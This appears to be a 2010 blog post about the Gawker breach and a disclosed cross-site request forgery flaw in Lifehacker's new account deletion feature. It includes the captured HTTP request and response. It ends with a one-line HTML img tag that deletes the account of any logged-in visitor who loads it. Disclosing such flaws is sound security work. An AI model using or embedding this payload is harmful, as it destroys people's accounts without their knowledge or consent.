Recently Added & Updated
Coming Soon!
Featured Articles
Coming Soon!
Search the Rotten Agenda
News
Content
Downloads
Sitemap
Contact
Posted by Vinnie Smegma on December 25th, 2010

Give Me One Line of HTML, and I'll Delete Your Gawker Account!

The Gawker hack left many of their users frustrated, and angry.

The Aftermath of the Gawker Breach

Online communities across the internet have been quite astir this past month — from the never-ending controversy surrounding Wikileaks and the Distributed Denial of Service (DDoS) attacks against its detractors to allegations of government backdoors placed within the OpenBSD operating system; another high-profile security issue making its rounds through various online media outlets was that of the Gawker breach. Not only was Gawker Media's source code for their administrative backend and content management system stolen (and then later exposed), but their user database, which has been said to contain roughly 1.3 million accounts, was also leaked for public consumption. Given the relatively lax password policy, or lack thereof, employed by Gawker, 50% of the passwords were cracked within a short timeframe using only "John the Ripper" — a feat which has helped lead to a surge of hacked email accounts, an uptick in Twitter SPAM, and the defacement of numerous social networking profiles.

Less than one full week after the compromise of their network was made known to the public Gawker's chief technology officer, Thomas Plunkett, wrote an email with his thoughts and resolutions on the matter, which was then distributed to each of the staff members. Mr. Plunkett explained, "Attention to completed work is every bit as important as attention to upcoming work. Our development efforts have been focused on new product while committing relatively little time to reviewing past work. This is often a fatal mistake in software development and was central to this vulnerability."

Admittedly I, Vinnie Smegma, have found Lifehacker, a subsidiary of the Gawker Media network, to be a personal favorite — though I've never posted a single comment nor created an account on their website. One of the more prominent complaints that has seemingly come to light in the wake of this fiasco however has been their members' contention over the inability to disable, remove, or even outright delete their accounts from Gawker's services. Only within the last few days has Gawker finally rolled out the changes necessary to allow its viewers to deactivate memberships through the use of the new account deletion feature; unfortunately this system is subject to abuse, is capable of deleting a third party's user account, and is able to do so without that individual's consent or notification.

Registering an Account on Lifehacker (Gawker Media)

Registering and creating a commenter account on Lifehacker, a website owned by Gawker Media.

Testing the new "Delete Account" Feature for Lifehacker

The new "Delete Account" button as it appears on the Lifehacker website.
Found on the "Lifehacker Compromised Commenting Accounts on Gawker Media FAQ" page the new "Delete Account" button creates an HTTP GET request for the following URL:

http://lifehacker.com/me/#deleteuser

Lifehacker's Account Deletion Form...

Once the previous HTTP request has been completed Gawker issues an account deletion form.

...and the Request Confirmation

Lifehacker/Gawker creates an additional prompt for final confirmation on account deletions.

The HTTP Requests Made for Deletion From Gawker

POST /?op=deleteuser HTTP/1.1
Host: lifehacker.com
User-Agent: (Removed)
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://lifehacker.com/me/
Content-Length: (Removed)
Cookie: (Removed)
Pragma: no-cache
Cache-Control: no-cache

username=(Removed)&id=(Removed)&formToken=(Removed)

Lifehacker's JSON Server Response

{"action":"setprofile","success":true,"id":"(REMOVED)","username":"(REMOVED)"}

Crafting a Simple Exploit to Delete Gawker Accounts

Gawker's "Delete Account" feature (such as the one found on Lifehacker) is vulnerable to a simple Cross-Site Request Forgery (CSRF or XSRF); this allows the function to be trivially exploited through various means — even with just a single line of HTML. It seems that there are no checks or boundaries on this vulnerability: it'll work regardless of whether the HTTP request method is "GET" or "POST", and no matter where the referrer points.

<img alt="Your Lifehacker Account Has Just Been Deleted If You're Logged In!" src="http://lifehacker.com/?op=deleteuser" />